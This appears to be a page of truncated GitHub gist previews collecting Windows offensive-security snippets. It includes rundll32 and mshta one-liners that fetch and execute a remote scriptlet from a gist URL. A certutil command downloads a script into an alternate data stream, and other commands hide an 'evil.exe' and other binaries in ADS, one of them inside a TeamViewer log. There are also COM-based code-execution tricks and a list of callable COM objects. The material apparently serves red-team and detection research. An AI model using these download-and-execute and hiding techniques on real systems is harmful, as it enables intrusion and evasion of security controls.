| # Ensure System.Security assembly is loaded. | |
| Add-Type -AssemblyName System.Security | |
| function ConvertTo-CIPolicy { | |
| <# | |
| .SYNOPSIS | |
| Converts a binary file that contains a Code Integrity policy into XML format. | |
| Author: Matthew Graeber (@mattifestation) |
| var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); | |
| actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest"; | |
| try | |
| { | |
| var DX = actCtx.CreateObject("DynamicWrapperX"); | |
| DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function. | |
| res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function. | |
| } | |
| catch(e){ WScript.Echo("Fail");} |
| xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
| verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC} | |
| create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC} | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close(); | |
| mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close(); |
| [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript'); | |
| $js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");' | |
| [Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()); |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| ::########################################################################################################################## | |
| :: | |
| :: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing, | |
| :: | |
| :: OR BOTH!!! | |
| :: | |
| :: YOU HAVE BEEN WARNED!!!!!!!!!! | |
| :: | |
| :: This script is provided "AS IS" with no warranties, and confers no rights. | |
| :: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section, |
| // The following COMobjects are all callable in cscript with WScript.CreateObject(COMObject) | |
| ADODB.Command is callable! | |
| ADODB.Command.6.0 is callable! | |
| ADODB.Connection is callable! | |
| ADODB.Connection.6.0 is callable! | |
| ADODB.Error is callable! | |
| ADODB.Error.6.0 is callable! | |
| ADODB.Parameter is callable! | |
| ADODB.Parameter.6.0 is callable! | |
| ADODB.Record is callable! |
| { | |
| "Powershell": { | |
| "process_name": ["powershell.exe"] | |
| }, | |
| "Utilman": { | |
| "process_name": ["utilman.exe"] | |
| }, | |
| "msiexec": { | |
| "process_name": ["msiexec.exe"] | |
| }, |
| /* | |
| ================================ Compile as a .Net DLL ============================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
| */ | |
| using System.Windows.Forms; | |
| namespace TestNamespace |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
